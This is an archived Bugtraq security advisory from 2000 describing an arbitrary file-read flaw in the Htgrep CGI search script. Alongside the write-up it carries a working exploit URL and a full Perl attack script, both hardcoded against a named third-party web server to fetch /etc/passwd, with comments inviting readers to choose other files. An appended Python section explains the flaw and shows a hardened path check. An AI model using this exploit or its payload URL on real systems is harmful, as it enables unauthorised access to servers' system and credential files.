Date: Thu, 17 Aug 2000 13:41:42 -0000
From: n30 <n30@GMX.CO.UK>
Subject: Htgrep CGI Arbitrary File Viewing Vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Software: Htgrep
URL: http://www.iam.unibe.ch/~scg/Src/Doc/
Version: All Versions
Platforms: Unix, maybe WinNT?
Author status: Notified

Summary:
Any remote user can view arbitrary files on the system with the privileges of the web user.

Vulnerability:
The CGI allows a user to specify a header and footer file to be appended to the search output; this file should be located in the wwwroot, which is specified in the script itself. Any attempt to specify a header or footer file by using backwards directory referencing is trapped, although it is possible to specify a file using an absolute path.

Exploit:
http://www.dematel.com/cgibin/htgrep/file=index.html&hdr=/etc/passwd

The file /etc/passwd will be displayed instead of the default header file.

Fixes:
The author has been notified; it is likely that an update will be available shortly.

n30
n30@gmx.co.uk

Exploit Follows:

#!/usr/local/bin/perl
#
# Htgrep EXPLOIT Script by n30 17/8/2000
#
# For: Unix/Linux all Distro's
# maybe Winnt?? anyone??
#
# Versions: All up to latest: htgrep v3.0
#
# Info: to find the version number being used:
#
# www.server.com/cgi-bin/htgrep/version
#
# Some ppl use a wrapper for the script thusly
# eliminating the file argument, the sploit will
# still werk just add &hdr=<filename> to the end :-)
#
# if &isindex=<text> is present in the URL REMOVE IT!!!
# or else the exploit won't werk :-)
#
# Mail : n30@gmx.co.uk

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

my $ua = new LWP::UserAgent;

# *************************************************
my $TargetHost = "www.dematel.com";
my $TargetPath = "/cgibin/htgrep";

# SearchFile can commonly be index.html or some other file in the wwwroot
my $SearchFile = "index.html";

# FiletoGet ?? think for ur self :-)
my $FiletoGet = "/etc/passwd";
# **************************************************

# Build the request URL: the hdr parameter names the header file
my $url = "http://" . $TargetHost . $TargetPath . "/file=$SearchFile&hdr=$FiletoGet";

print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n");
print("URL: $url\n\n");

my $request  = new HTTP::Request('GET', $url);
my $response = $ua->request($request);

if ($response->is_success) {
    print $response->content;
} else {
    print $response->error_as_HTML;
}

# Definitely NOT Hack.co.za #
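As an added illustration, not part of n30's post nor of the Htgrep code itself, the following Python shows why a check that only traps ".." (the behaviour the advisory describes) still lets an absolute hdr= value through, and how a containment check anchored at the document root rejects both cases. WWWROOT, naive_check and resolve_header are assumed names for this example only.

```python
import posixpath

# Constructed document root for the example; in Htgrep the real wwwroot is
# hard-coded inside the CGI script (assumption: this value stands in for it).
WWWROOT = "/var/www/htdocs"


def naive_check(hdr: str) -> bool:
    """Mimics the check the advisory describes: refuses any '..' path
    component, but accepts an absolute path unchanged (the flaw)."""
    return ".." not in hdr.split("/")


def resolve_header(hdr: str, wwwroot: str = WWWROOT):
    """Hardened variant: reject absolute paths outright, join the value under
    wwwroot, normalise it lexically, and require the result to stay inside
    wwwroot. Returns the safe path or None when the value is refused."""
    if not hdr or "\0" in hdr or posixpath.isabs(hdr):
        return None
    root = posixpath.normpath(wwwroot)
    candidate = posixpath.normpath(posixpath.join(root, hdr))
    # Containment test: the candidate must be strictly below the root.
    # Note: this is a lexical check; a live CGI should additionally realpath()
    # the opened file to defeat symlinks pointing outside the root.
    if candidate == root or not candidate.startswith(root + "/"):
        return None
    return candidate
```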